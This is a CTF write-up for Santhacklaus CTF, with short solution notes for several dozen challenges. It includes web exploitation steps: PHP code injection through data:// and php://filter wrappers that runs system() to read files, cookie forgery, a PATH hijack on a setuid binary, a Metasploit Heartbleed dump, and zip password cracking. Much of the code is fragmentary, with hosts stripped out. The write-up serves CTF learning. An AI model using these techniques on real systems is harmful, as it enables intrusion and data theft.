Santhacklaus CTF

0 Bonjour OK

Just submit this flag ;) That’s what you’re supposed to find in every challenge and then submit to earn points !


50 I got 404 problems

404 : page not found ?

$ curl


50 Playa del fuego

We intercepted this document. Uncover the redacted part.

  • pdf avec le flag en bas, ecrit en noir avec fond noir
  • copier le flag et le coller quelque part d’autre


50 Trashack

We got in! We found something weird. Uncover the truth!

  • .jpg avec le début du flag, ouvrir les yeux pour lire le suite


50 Haystack

Find the needle. Be wise, patient and clever. Don’t try to rush things. You only have ONE TRY….

  • fichier texte avec un grand nombre de flag potentiels
$ cat challenge.txt | grep "IMTLD{" | grep "}" # merci Mel ;)
$ cat challenge.txt | grep "IMTLD{.*}"


100 Slept on the kayboard

A super hacker has find a way to hide a super secret message ! Can you find the super secret message hidden by the super hacker and become a super hacker yourself ?

  • QRcode qui stocke du binaire
# binary to ascii
$ echo "obase=16; ibase=2; `zbarimg --raw -q ./qrcode.png`" | bc | xxd -ps -r # binary to b16 to ascii
49  4D  54   4C  44  7B     43  34 74     30 6E    54   68    33 4B  33 79     62    30 34 72     64    7D
# hex to ascii
# python3
>>> import binascii
>>> data= '494D544C447B433474306E5468334B337962303472647D'
>>> binascii.unhexlify(data)


100 What’s his name

Johnson ! We manage to get a packet capture of the network of a hacker ! Find his password ! Submit the flag as IMTLD{password}

  • fichier .pcapng
  • ouvir avec wireshark
  • sur le premier paquet: Analyze > Follow > TCP Stream
  • et trouver le mot de passe


100 Authentification 2.0

Did you GET it?

# requête POST avec username = admin
curl -X POST --data "username=admin" ''


100 Xtracted

A little thug played with us. He extracted information from our server and just sent us what he got. But our engineers were unable to read it. Help us please! 😭

# with Brainfuck Interpreter we have:


150 Stego101

A g(r)eek riddle.

$ file challenge2.jpg
challenge2.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, comment: "steghide : doyouknowdaway", baseline, precision 8, 297x153, frames 3

$ steghide extract -sf challenge.jpg # password = doyouknowdaway
$ cat flag.txt


150 Crackme1

Grab you tools and crack me this file Billy !

$ r2 ./crack_me1
> aaa
> afl
> s main
> pdf
0x00001171      48b86861636b.  movabs rax, 0x616d72656b636168 ; 'hackerma'
0x0000117b      488945ce       mov qword [s], rax
0x0000117f      66c745d66e00   mov word [local_2ah], 0x6e  ; 'n'
0x00001185      c645b09e       mov byte [local_50h], 0x9e
0x00001189      c645b1a2       mov byte [local_4fh], 0xa2
0x0000118d      c645b2a9       mov byte [local_4eh], 0xa9
0x00001191      c645b3a1       mov byte [local_4dh], 0xa1
0x00001195      c645b499       mov byte [local_4ch], 0x99
0x00001199      c645b5d0       mov byte [local_4bh], 0xd0
0x0000119d      c645b6ae       mov byte [local_4ah], 0xae
0x000011a1      c645b785       mov byte [local_49h], 0x85
0x000011a5      c645b8ca       mov byte [local_48h], 0xca
0x000011a9      c645b996       mov byte [local_47h], 0x96
0x000011ad      c645bac7       mov byte [local_46h], 0xc7
0x000011b1      c645bb88       mov byte [local_45h], 0x88
0x000011b5      c645bc89       mov byte [local_44h], 0x89
0x000011b9      c645bd9d       mov byte [local_43h], 0x9d
0x000011bd      c645be89       mov byte [local_42h], 0x89
0x000011c1      c645bfb8       mov byte [local_41h], 0xb8
0x000011c5      c645c0c0       mov byte [local_40h], 0xc0
0x000011c9      c645c188       mov byte [local_3fh], 0x88
0x000011cd      c645c2c7       mov byte [local_3eh], 0xc7
0x000011d1      c645c39d       mov byte [local_3dh], 0x9d
0x000011d5      c645c489       mov byte [local_3ch], 0x89
0x000011d9      c645c5c7       mov byte [local_3bh], 0xc7
0x000011dd      c645c6c7       mov byte [local_3ah], 0xc7
0x000011e1      c645c7ce       mov byte [local_39h], 0xce
0x000011e5      c645c8d2       mov byte [local_38h], 0xd2
0x000011e9      c645c900       mov byte [local_37h], 0
0x000011ed      c745ec000000.  mov dword [local_14h], 0
# on sait que le format du flag est IMTLD{...}
# python3
>>> print(ord('I'))
>>> print(ord('M'))
  • nous avons donc un delta de 4 entre ces deux valeurs
  • on remarque qu’il y a aussi un delta de 4 entre 0x9e (=158) et 0xa2 (=162)
  • c’est un chiffrement par décalage de 85
tab = [0x9e, 0xa2, 0xa9, 0xa1, 0x99, 0xd0, 0xae, 0x85, 0xca, 0x96, 0xc7, 0x88, 0x89, 0x9d, 0x89, 0xb8, 0xc0, 0x88, 0xc7, 0x9d, 0x89, 0xc7, 0xc7, 0xce, 0xd2]

res = ''
for i in tab:
  res += chr(i-85)


150 Menthal arithmetic

I hope you’re fast Host Port 10001

$ nc 10001
Welcome !!
You must calculate the square root of the 1st number, multiply the result by the cube of the 2nd number and send the integer part of the final result...
I almost forget, you only have 2 seconds to send me the result
1st number : 2077
2nd number : 3373

import os, socket, sys
import math

serv_addr = ''
port = 10001
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    my_sock.connect((serv_addr, port))
except Exception as e:
    print('Connection problem', e.args)

recv1 = my_sock.recv(1024)

recv2 = my_sock.recv(1024)

tab = recv2.split(b' ')

nb1 = int(tab[3])
nb2 = int(tab[7])

print('nb1 -> ', nb1)
print('nb2 -> ', nb2)

nb1_square = math.sqrt(nb1)
print('nb1_square -> ', nb1_square)

nb2_cube = math.pow(nb2, 3)
print('nb2_cube ->', nb2_cube)

res = nb1_square * nb2_cube
print('res -> ', res)

res_int = int(res)
print('int(res) -> ', res_int)




Autre version

from pwn import *
from math  import *

r = remote("", 10001)

n1 = int(r.recvline())
n2 = int(r.recvline().split(":")[1])
res = int(sqrt(n1) * pow(n2, 3))



150 ArchDrive (1/3)

A new company called ArchDrive recently launched a web storage service. Can you collect some informations, like administrator’s name?

  • page web avec un formulaire
  • on essaye de reset le password
  • on voit
  • peut-être une LFI ?
$ curl


150 The Flag Grabber

Can you capture the flag ?

<div id="cursor">
  <input type="submit" value="I want my flag !" name="false_button" onclick="message()">

<form method="POST" id="formulaire">
  <input type="submit" value="I want my flag !" name="button">
  • la première <div> suit le curseur
  • la seconde n’est pas affiché car visibility: hidden; en css.
#formulaire {
  visibility: hidden;
  • désactiver cette regle
  • le bouton s’affiche, utiliser les tabulations pour se déplacer et cliquer dessus
  • ou supprimer la <div> qui suit le curseur et cliquer sur le bouton I want my flag


150 On the road again

The flag is… in the flag file :)
Protocol: SSH
Port: 51333
Username: challenger1
Password: challenger1

$ ssh -p 51333 challenger1@
$ ls -al
-r--r----- 1 admin admin         30 Dec 25 21:10 .flag
-r-sr-x--- 1 admin challenger1 8640 Dec 25 21:10 ch1
-rw-r--r-- 1 root  challenger1  117 Dec 25 21:10 ch1.c
$ cat ch1.c
int main(void) {
    system("rm /home/challenger1/.flag");
    return 0;

$ ./ch1
Wow don't delete the flag dude

# changer le comportement de la commande rm par cat
$ mkdir /tmp/apges01
$ cd /tmp/apges01
$ cat << end > rm
> cat /home/challenger1/.flag
> end
$ ls -al
-rw-r--r-- 1 challenger1 challenger1   28 Dec 25 21:12 rm
$ chmod +x ./rm
$ echo $PATH
$ export PATH=/tmp/apges01:$PATH
$ /home/challenger1/ch1


150 ArchDrive (2/3)

Well done ! Do you think it is possible now to gain access to a user account ?

  • après quelques recherhces, on remarque que les base64 filter php fonctionnent
  • https://.../?page=php://filTer/convert.base64-encode/resource=login.php
  • dans login.php on voit un myfiles.php
  • https://.../?page=php://filTer/convert.base64-encode/resource=myfiles.php
  • on a une liste de fichiers qu’on peut récupérer
# exemple de ressource
<li><a class="txt2" href="21f64da1e5792c8295b964d159a14491/lol.jpg">lol.jpg</a></li>

# lien associé"+ le href précédent
# est protégé par un mdp
$ fcrackzip -v -D -u -p ./rockyou.txt
$ cat password.txt


200 Pong

Our SIEM got alerted by a surprisingly high number of ICMP requests on the network. Investigate.

  • fichier .pcapng
  • rempli avec un grand nombre de paquets ICMP
  • png ? dans le l’extension
  • data dans les packets ICMP ? oui
$ tshark -r ./challenge.pcapng -T fields -e data

# on remarque que les echo request et echo reply ont les même data
# il faut donc eviter les doublons
$ tshark -r ./challenge.pcapng -T fields -e data | uniq

# les données sont en base16, il faut les transformer en ascii
# on les passe en base64 puis on decode
$ shark -r ./challenge.pcapng -T fields -e data | uniq |  xxd -ps -r | base64 -d > res.png

$ file res.png
test.png: PNG image data, 487 x 272, 8-bit/color RGBA, non-interlaced


200 QREncoded

QRCoding is the new black.

  • dossier rempli de QRcode de 0 à 843
  • lire toutes les data et les regrouper dans un fichier ?
from PIL import Image
from pyzbar.pyzbar import decode
import base64

f_start = 'part_'
f_end = '.png'

res = bytes()
i = 0
while i < 844:
    d = decode( + str(i) + f_end).convert('RGBA'))
    res += base64.b64decode(d[0].data)
    i = i + 1


my_file = open('res', 'wb')

$ file res
challenge/res: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300


200 love

love invitation.

$ file PGP public key block
  • clé PGP ? non, beaucoup trop longue !
# decode base64
$ sed -n 4,1717p ./ | base64 -d > key.b64

# on obtient une image SVG
$ file key.b64
key.b64: SVG Scalable Vector Graphics image

$ mv key.b64 key.svg
  • on l’ouvre et i love you, pas de flag
  • on regarde le svg
  • on remarque que les couleurs sont soit noirs soit blanches
  • et que opacity = 0 ? le modifier à 1 ? à 0,5 (tous les modifiers)
# en changeant toutes les valeurs de l'opacity à 0.5
$ sed 's/opacity="0"/opacity="1"/g' ./key.svg | sed 's/opacity="1"/opacity="0.5"/g' > res.svg


200 SRHT

We have spotted a suspicious website recently published. We don’t know yet if this site is a bad joke or if it belongs to a real terrorist entity. No member of our team has so far been able to connect. You have been asked to audit and infiltrate this mysterious website. Good luck !

  • site russe bizarre
  • on remarque un cookie “connexion” qui est toujours le même, avec valeur bizarre
  • avec burp on remarque qu’il nous renvoi toujours le même cookie
  • et si on changait le cookie ?
# requête classique avec cookie
GET / HTTP/1.1
Cookie: connexion=8aca4f36774f82a67c507cb9c96679482e2cc767f2d38502269557a566b092fb

# requête modifiée
GET / HTTP/1.1
Cookie: connexion=yolo
  • on recoit: Hacking Attempt Detected !!! Launching russian DDoS attack to the attacker...
  • la valeur du cookie change donc le comportement du site
  • il faut maintenant trouver quelle fonction retourne la valeur de ce cookie
  • peut-être une fonction de hachage ?
  • partons sur fct de hash
    • md5 : trop court
    • sha512 : trop long
    • sha256 : probale
  • (sinon on cherche sur google le hash et on s’apercoit que c’est du sha256)
# on hash "admin"
$ echo -n "admin" | shasum -a 256
  • on remplace avec ce nouveau hash, et on a : Are you the real administrator ? Remember: You need to come from the "" website with the "Black Hat Browser" navigator !
$ nc 443
GET / HTTP/1.1
Referer: # et non From: !!
User-Agent: Black Hat Browser
Cookie: connexion=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a91


200 3D Industry (2/2)

Now that the vulnerability has been proven, the CEO is worried about some sensitive files he uploads in the administration section of the website. Let’s finish this audit properly ! Lien:

  • voir 3D Industry (1/2)
  • car même chose mais dans le dossier admin
echo -n "<?php echo system(\"cat admin/uploads/s3cr37-d0cum3n7.txt\"); ?>" | base64
  • on récupére toutes les lignes depuis le html, qu’on met dans un fichier
$ wc -c temp.txt
  675429 temp.txt

# supprimer doublons
$ cat temp.txt| uniq > temp2.txt

# bon nombre de lignes
$ wc -c temp2.txt
  337716 temp2.txt

# c'est de la base 64
$ cat temp2.txt | base64 -D > temp3.txt

# type du fichier
file temp3.txt
temp3.txt: data ????

$ head -n1 temp3.txt
SketchUp STL com.sketchup.SketchUp.2018

$ mv temp3.txt temp3.stl


200 Trolloguess

Many of you realized how low the guess-level was in this CTF. But some still managed to find reasons to complain. We’re now talking to these people. We’ll show you what real guessing is… Let’s get ready to rumble! (Also, would our CTF be a real CTF without a challenge like this?)

$ binwalk ./challenge.png

# extract
$ binwalk --dd=".*" ./challenge.png

# password of zip in image with aperi'solve (
# new image, use "outguess tool" with password "WHAT" -> other pass

$ qsstv # ubuntu
$ pactl load-module module-null-sink sink_name=virtual-cable


200 Can you SEE the flag ?

You cannot see it, and yet it’s here
Zip file
PS : Call me if you need to edit a video ;)

# mot de passe du zip
$ fcrackzip -v -u -D -p rockyou.txt
PASSWORD FOUND!!!!: pw == cheese

# extraire le son
$ ffmpeg -i Why\ \?.mp4 -vn sound.mp3
  • utiliser Sonic Visualiser
  • Layer > add spectrogram > All channels mixed


250 Volatility101

Welcome to this introductory forensics challenge. You have been hired by your local police department to analyze a memory dump. This challenges is split into 3 steps. In each step, you will find a “Fl4g” (flag). Concatenate the three flags, separated by “_”, and you will have have the final flag to validate the challenge.
Step 1 : find the computer name → part1
Step 2 : find the filename of the .zip archive on the desktop → part2 (without .zip)
Step 3 : recover the archive’s content, you will find a file → part3
The final flag has to be submitted in the format IMTLD{part1_part2_part3}**.

# Step 1
# google : volatility find hostname dump

# profile
$ vol -f ./challenge.dmp imageinfo

$ vol -f ./challenge.dmp --profile=Win7SP1x86_23418 hivelist

$ vol -f ./challenge.dmp --profile=Win7SP1x86_23418 printkey -o 0x8901a1d8 -K 'ControlSet001\Control\ComputerName\ComputerName'
REG_SZ        ComputerName    : (S) WELC0M3

# autre solution
$ vol -f challenge.dmp --profile="Win7SP1x86_23418" envars | grep COMPUTERNAME
# Step 2
$ vol -f ./challenge.dmp --profile=Win7SP1x86_23418 filescan | grep zip
0x000000003e067440      8      0 RWD--- \Device\HarddiskVolume2\Users\John\Desktop\
# Step 3
$ vol -f ./challenge.dmp --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003e067440 -D dossier

$ cd dossier

$ file file.None.0x85db26e0.dat
file.None.0x85db26e0.dat: Zip archive data, at least v1.0 to extract

$ mv file.None.0x85db26e0.dat

$ fcrackzip -v -u -D -p /usr/share/wordlist/rockyou.txt ./
PASSWORD FOUND!!!!: pw == iamhacker

$ unzip ./
part3.txt password:
 extracting: part3.txt

$ cat part3.txt


250 crackme2


$ r2 ./crack_me2
> aaa
> afl
> s main
> pdf
0x00001175      c645b1a9       mov byte [local_4fh], 0xa9
0x00001179      c645b2c2       mov byte [local_4eh], 0xc2
0x0000117d      c645b3cd       mov byte [local_4dh], 0xcd
0x00001181      c645b48d       mov byte [local_4ch], 0x8d
0x00001185      c645b599       mov byte [local_4bh], 0x99
0x00001189      c645b6c0       mov byte [local_4ah], 0xc0
0x0000118d      c645b7aa       mov byte [local_49h], 0xaa
0x00001191      c645b8ab       mov byte [local_48h], 0xab
0x00001195      c645b9b9       mov byte [local_47h], 0xb9
0x00001199      c645baa9       mov byte [local_46h], 0xa9
0x0000119d      c645bbc6       mov byte [local_45h], 0xc6
0x000011a1      c645bc9f       mov byte [local_44h], 0x9f
0x000011a5      c645bdbb       mov byte [local_43h], 0xbb
0x000011a9      c645beca       mov byte [local_42h], 0xca
0x000011ad      c645bfcc       mov byte [local_41h], 0xcc
0x000011b1      c645c000       mov byte [local_40h], 0
0x000011b5      c645909e       mov byte [local_70h], 0x9e
0x000011b9      c64591a2       mov byte [local_6fh], 0xa2
0x000011bd      c64592a9       mov byte [local_6eh], 0xa9
0x000011c1      c64593a1       mov byte [local_6dh], 0xa1
0x000011c5      c6459499       mov byte [local_6ch], 0x99
0x000011c9      c64595d0       mov byte [local_6bh], 0xd0
0x000011cd      c64596a9       mov byte [local_6ah], 0xa9
0x000011d1      c64597bd       mov byte [local_69h], 0xbd
0x000011d5      c6459886       mov byte [local_68h], 0x86
0x000011d9      c64599c8       mov byte [local_67h], 0xc8
0x000011dd      c6459a86       mov byte [local_66h], 0x86
0x000011e1      c6459bc8       mov byte [local_65h], 0xc8
0x000011e5      c6459ca3       mov byte [local_64h], 0xa3
0x000011e9      c6459d85       mov byte [local_63h], 0x85
0x000011ed      c6459ec9       mov byte [local_62h], 0xc9
0x000011f1      c6459f98       mov byte [local_61h], 0x98
0x000011f5      c645a0bd       mov byte [local_60h], 0xbd
0x000011f9      c645a188       mov byte [local_5fh], 0x88
0x000011fd      c645a289       mov byte [local_5eh], 0x89
0x00001201      c645a3c9       mov byte [local_5dh], 0xc9
0x00001205      c645a486       mov byte [local_5ch], 0x86
0x00001209      c645a5c3       mov byte [local_5bh], 0xc3
0x0000120d      c645a6bc       mov byte [local_5ah], 0xbc
0x00001211      c645a7d2       mov byte [local_59h], 0xd2
  • on voit aussi un décalage de -85
tab = [0x9e, 0xa2, 0xa9, 0xa1, 0x99, 0xd0, 0xa9, 0xbd, 0x86, 0xc8, 0x86, 0xc8, 0xa3, 0x85, 0xc9, 0x98, 0xbd, 0x88, 0x89, 0xc9, 0x86, 0xc3, 0xbc, 0xd2]

res = ''
for i in tab:
    res += chr(i-85)



250 jeanclaude.vd

This website has been created by a fanboy of Jean-Claude Van Damme without any background on security
Website :

  • todo.txt et admin.html (-> 404)
  • todo.txt:
    TO CHECK  Delete the admin page (server crashed while editing) <-----
    TO DO     Add a contact page
    TO DO     Create a Facebook page
    DONE      Watch Bloodsport
    DONE      Drink water, regularly
  • fichier temporaire de vim ?


300 Only numbers here

I lost my source code file so I don’t remember what this server wants
Port 20002

$ nc 20002
Welcome to this challenge !
You must find a good string
The string must end with "Pinkflood"
After treatment, the character b isn't a number
The string must end with "Pinkflood"
After treatment, the character e isn't a number
  • on remarque qu’il veut que des nombres, et qu’il refuse les a b c d e f
  • donc système hexa
  • peut-être hash -> After treatment
  • lequel ? sha ? md5 -> oui
  • trouver une chaine qui se termine par Pinkflood et qui a un md5 avec que des nombres
#!/usr/bin/env python3

import hashlib
import string

i = 0
while True:
    to_hash = f'{i}Pinkflood'
    h = hashlib.md5(to_hash.encode()).hexdigest()

    if set(h).issubset(string.digits):
        print(f'md5({to_hash}) = {h}')
    i += 1

# md5(1140633Pinkflood) = 26062149783494508159682139582576
$ nc 20002
Welcome to this challenge !
You must find a good string
Flag : IMTLD{Brut3F0rc31sTh3N3wBl4ck}


400 Be my Valentine

Take care of your heart (maybe also eyes)

  • ssl cert different from others site pages


$ sudo  docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
$ msfconsole
> msf5 search heartbleed
> msf5 use auxiliary/scanner/ssl/openssl_heartbleed
> show actions
> set action DUMP
> set RHOSTS
> set RPORT 1073
> set TLS_VERSION 1.2
> set VERBOSE true
> run


400 RandomSecretmessAge

We have collected some files from a strange intercepted communication. Can you investigate ?

  • zip avec fichiers
  • encryptedKey encryptedMessage public.key
file encryptedMessage
encryptedMessage: openssl enc'd data with salted password
  • il faut donc un password ?
cat public.key
-----END PUBLIC KEY-----
  • la clé parait petite
  • on va utilise RsaCtlTool

  • trouver clé privée
$ python2.7 ./ --publickey ../public.key --private

# déchiffrer encryptedKey
$ python2.7 ./ --publickey ../public.key --uncipherfile ../encryptedKey
Clear text : .......... My_WiF3_d0eSn’T_h4v3_T0_kN0w_Th1s_Symm3tr1k_k3Y

# My_WiF3_d0eSn’T_h4v3_T0_kN0w_Th1s_Symm3tr1k_k3Y est sûrement la clé de encryptedMessage
$ openssl enc -aes-256-cbc -d -in ../encryptedMessage -out file.txt -k "My_WiF3_d0eSn’T_h4v3_T0_kN0w_Th1s_Symm3tr1k_k3Y"

$ cat file.txt


400 3D Industry (1/2)

3D Industry is a freshly launched startup which is specialized in 3D printing. The CEO has some doubts about the secured development of the website. Can you prove him that his doubts are well-founded ?

  • on remarque rapidement que la faille peut venir de l’url, peut-être une LFI ?
  • après avoir testé des trucs basiques, rien d’utile
  • par contre le module base64 fonctionne:
$ echo -n "<?php echo "yolo"; ?>" | base64
  • ce lien affiche bien yolo, le code est donc executé;base64,PD9waHAgZWNobyB5b2xvOyA/Pg==
# on fait un ls avec system()
$ echo -n "<?php echo system(\"ls -al\"); ?>" | base64

# on remarque un dossier .hidden
# on navigue
$ echo -n "<?php echo system(\"ls -al .hidden/this/is/the/path/to/the/flag/\") ?>" | base64

# on trouve un flag.txt
$ echo -n "<?php echo system(\"cat .hidden/this/is/the/path/to/the/flag/flag.txt\") ?>" | base64;base64,PD9waHAgZWNobyBzeXN0ZW0oImNhdCAuaGlkZGVuL3RoaXMvaXMvdGhlL3BhdGgvdG8vdGhlL2ZsYWcvZmxhZy50eHQiKSA/Pg==


450 j.l.c.s.v.b.d

You’ll get JCVDed

  • stegsolv rapidement

  • qrcode in the image
  • 3 qr code in the pictures, one for each color layer, red, blue, green

from PIL import Image

im ='challenge.png')

lar = im.size[0]
hau = im.size[1]
orig_pix = im.load()

for k in range(0,3):
  bg ='RGB', (lar,hau), 'white')
  bg_pix = bg.load()
  final = []
  a = []
  for i in range(0,lar,2):
    buf = []
    for j in range(0,hau,2):
      red = orig_pix[i,j][0]
      green = orig_pix[i,j][1]
      blue = orig_pix[i,j][2]
      a = [red, green, blue]
      buf.append(red & 1)
      if a[k] & 1:
        bg_pix[i/2,j/2] = (255,255,255)
        bg_pix[i/2,j/2] = (0,0,0)
$ for i in {0..2}; do zbarimg -q --raw qr$i.png; done | tr -d '\n'